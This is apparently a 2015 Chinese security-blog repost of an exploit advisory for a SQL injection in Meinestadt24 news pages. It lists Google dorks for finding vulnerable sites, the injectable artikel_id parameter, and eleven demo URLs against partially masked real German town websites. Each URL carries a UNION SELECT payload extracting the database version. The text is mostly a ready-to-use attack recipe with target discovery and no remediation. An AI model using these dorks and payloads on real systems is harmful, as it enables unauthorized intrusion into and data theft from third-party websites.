Meinestadt24注入漏洞

[-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-]
 
Exploit Title : Meinestadt24 SQL Injection Vulnerability
 
Exploit Author : Ashiyane Digital Security Team
 
Google Dork One : intext:© 2015 meinestadt24
Google Dork Two : inurl:nachrichten.php?artikel_id=
 
Date : 2015-7-25
 
Tested On : Windows Se7en
 
[-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-]
 
Path Of Vulnerability :
 
http://Target.de/nachrichten.php?artikel_id=-AnyNumber [SQLI]
 
* Reminder : Your Sqli Command Needs UrlEncode
 
[-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-]
Demos :
 
http://www.meiXgriesheim.de/nachrichten.php?artikel_id=-983722 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
http://www.meiXeckarsulm.de/nachrichten.php?artikel_id=-990952 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
http://www.meinXnsberg.de/nachrichten.php?artikel_id=-293312 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
http://www.meXberbach.de/nachrichten.php?artikel_id=-991321 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
http://www.meXschaffenburg.de/nachrichten.php?artikel_id=-74847 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
http://www.meXarmstadt.de/nachrichten.php?artikel_id=-996681 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
http://www.meXabenhausen.de/nachrichten.php?artikel_id=-992823 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
http://www.meXkarlsruhe.de/nachrichten.php?artikel_id=-88747 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
http://www.mein-Xchenzell.de/nachrichten.php?artikel_id=-46129 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
http://www.mXbebra.de/nachrichten.php?artikel_id=-981361 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
http://www.mein-Xrsch.de/nachrichten.php?artikel_id=-987491 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##
 
And many more ...

本文固定链接: https://www.unhonker.com/bug/1836.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2015年07月27日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Meinestadt24注入漏洞 | 90' s Blog|关注网络信息安全
关键字:

Meinestadt24注入漏洞:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!